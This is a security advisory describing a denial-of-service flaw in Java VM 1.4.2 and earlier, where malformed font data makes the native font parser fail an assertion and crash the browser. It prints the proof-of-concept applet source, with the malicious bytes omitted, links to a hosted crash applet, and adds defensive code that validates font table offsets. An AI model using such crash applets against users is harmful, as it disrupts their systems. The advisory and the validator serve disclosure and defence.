A specially written Java applet can cause the JVM to crash due to a failed assertion, which could crash the browser itself.
Credit:
The information has been provided by Marc Schoenefeld.
Vulnerable Systems:
* Java Virtual Machine versions 1.4.2_xx and prior (all platforms)
Immune Systems:
* Java Virtual Machine version 1.5.0_beta
Vendor Status:
Sun has been contacted regarding the issue, but no patch or fix for version 1.4 of the JVM has been released. The only workaround is not to use that version of the JVM. Upgrading to the new version 1.5 should solve the problem.
Exploit:
When run, the offending Java applet can crash the JVM as soon as the user clicks the crash button. On Windows, if the user then clicks cancel, the browser itself crashes as well; on Linux, Firefox/Mozilla crashes immediately. The following error message is usually printed:
java_vm: ../../../src/share/native/sun/awt/font/fontmanager/fontobjects/fontObject.cpp:418: const void * fileFontObject::ReadChunk(UInt32, UInt32, void * = 0): Assertion `offset < fFileSize' failed.
INTERNAL ERROR on Browser End: Pipe closed during read? State may be corrupt
System error?:: Success
The same assertion fails on all platforms with just a small amount of varied output. The applet can be tried at http://www.illegalaccess.org/cms/?q=node/view/9. The code for the applet is listed below:
package org.illegalaccess.jvmcrash;

import java.util.*;
import java.applet.Applet;
import java.awt.color.*;
import java.awt.*;
import java.awt.event.*;
import java.io.*;

// The malformed font bytes themselves are not reproduced in the advisory.
class BadData {
    public final static byte[] data = {some bytes};
}

public class FontIPSClass extends Applet {

    // Feeds the bad font data to the font parser when the button is pressed.
    class MyButtonListener implements ActionListener {
        public void actionPerformed(ActionEvent event) {
            doit(new ByteArrayInputStream(BadData.data));
        }
    }

    Hashtable files = new Hashtable();
    TextArea ta;
    Button bu;

    public FontIPSClass() throws Exception {
        initme();
    }

    // Stand-alone entry point: parse the file named on the command line,
    // or the embedded bad data if no argument is given.
    public static void main(String[] a) throws Exception {
        //System.out.println(a[0]+testFileExistence(a[0]));
        if (a.length > 0)
            doit(new FileInputStream(a[0]));
        else
            doit(new ByteArrayInputStream(BadData.data));
    }

    private void initme() {
        ta = new TextArea("", 5, 40, TextArea.SCROLLBARS_NONE);
        add(ta);
        bu = new Button("Crash It");
        add(bu);
        bu.setBackground(Color.orange);
        bu.addActionListener(new MyButtonListener());
    }

    // Font.createFont hands the stream to the JVM's native font parser,
    // which is where the assertion quoted above fails.
    private static void doit(InputStream in) {
        try {
            Font f = Font.createFont(Font.TRUETYPE_FONT, in);
            System.out.println(f.getFamily());
            System.out.println(f.getPSName());
            System.out.println(f.getNumGlyphs());
        }
        catch (Exception e) {
            e.printStackTrace();
        }
    }
}
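The assertion that fails, offset < fFileSize in fileFontObject::ReadChunk, is a bounds check that only fires after the native font parser has already begun reading a table, and in a release build an assertion is a crash, not a recoverable error. An application that accepts fonts from untrusted sources can reject such input before it ever reaches Font.createFont by checking the sfnt table directory itself: every table record carries a 32-bit offset and length, and both must lie inside the file. The following is an added example, not part of the advisory or of Schoenefeld's applet; the class and method names (SfntChunkCheck, checkTableDirectory, sampleFont, MalformedFontException) are assumptions, and the byte arrays it builds are constructed for illustration and are not real fonts.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.DataInputStream;
import java.io.DataOutputStream;
import java.io.IOException;

public class SfntChunkCheck {

    /** Thrown when a table record in the directory points outside the font data. */
    public static class MalformedFontException extends IOException {
        public MalformedFontException(String msg) { super(msg); }
    }

    /**
     * Validates every record of the sfnt table directory against the total size
     * of the font data. This is the same bound (offset < file size) that the
     * native ReadChunk assertion in the advisory enforces, applied before the
     * bytes are handed to Font.createFont. Returns the number of records checked.
     */
    public static int checkTableDirectory(byte[] font) throws IOException {
        long fileSize = font.length;
        if (fileSize < 12) {
            throw new MalformedFontException("file too small for an sfnt header");
        }
        DataInputStream in = new DataInputStream(new ByteArrayInputStream(font));
        in.readInt();                       // scaler type (0x00010000 or 'true'); not needed here
        int numTables = in.readUnsignedShort();
        in.readUnsignedShort();             // searchRange
        in.readUnsignedShort();             // entrySelector
        in.readUnsignedShort();             // rangeShift

        // The directory itself must fit: 12-byte header plus 16 bytes per record.
        long directoryEnd = 12L + 16L * numTables;
        if (directoryEnd > fileSize) {
            throw new MalformedFontException("table directory (" + numTables
                    + " records) runs past end of file");
        }
        for (int i = 0; i < numTables; i++) {
            byte[] tag = new byte[4];
            in.readFully(tag);
            in.readInt();                                // checksum, not validated here
            long offset = in.readInt() & 0xFFFFFFFFL;    // uint32, read as unsigned
            long length = in.readInt() & 0xFFFFFFFFL;    // uint32, read as unsigned
            // Reject if the table starts at or past the end, or runs past it.
            // Written as length > fileSize - offset so offset + length cannot wrap.
            if (offset >= fileSize || length > fileSize - offset) {
                throw new MalformedFontException("table " + new String(tag, "US-ASCII")
                        + " at offset " + offset + " length " + length
                        + " exceeds file size " + fileSize);
            }
        }
        return numTables;
    }

    /**
     * Constructed sample (not a real font): a 12-byte sfnt header, one 16-byte
     * table record with the given offset/length, then 8 bytes of dummy payload
     * at offset 28, for 36 bytes in total.
     */
    static byte[] sampleFont(long tableOffset, long tableLength) throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        DataOutputStream out = new DataOutputStream(bos);
        out.writeInt(0x00010000);   // scaler type for TrueType outlines
        out.writeShort(1);          // numTables
        out.writeShort(16);         // searchRange
        out.writeShort(0);          // entrySelector
        out.writeShort(0);          // rangeShift
        out.writeBytes("head");     // tag of the single record
        out.writeInt(0);            // checksum
        out.writeInt((int) tableOffset);
        out.writeInt((int) tableLength);
        out.write(new byte[8]);     // dummy table payload
        return bos.toByteArray();
    }

    public static void main(String[] args) throws IOException {
        // Record points at the 8 payload bytes: offset 28, length 8, inside 36 bytes.
        byte[] good = sampleFont(28, 8);
        System.out.println("well-formed directory: " + checkTableDirectory(good) + " record(s) ok");

        // Record whose offset lies far beyond the end of the data: rejected up front
        // instead of reaching the native parser's assertion.
        byte[] bad = sampleFont(0x7FFFFFF0L, 8);
        try {
            checkTableDirectory(bad);
        } catch (MalformedFontException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

To use this ahead of Font.createFont, read the untrusted stream fully into a byte array, run checkTableDirectory on it, and only then wrap the array in a ByteArrayInputStream for the font API. The check covers the top-level table directory only; offsets stored inside individual tables (for example glyph offsets in loca) are a further layer that a full validator would also bound against the table's own length.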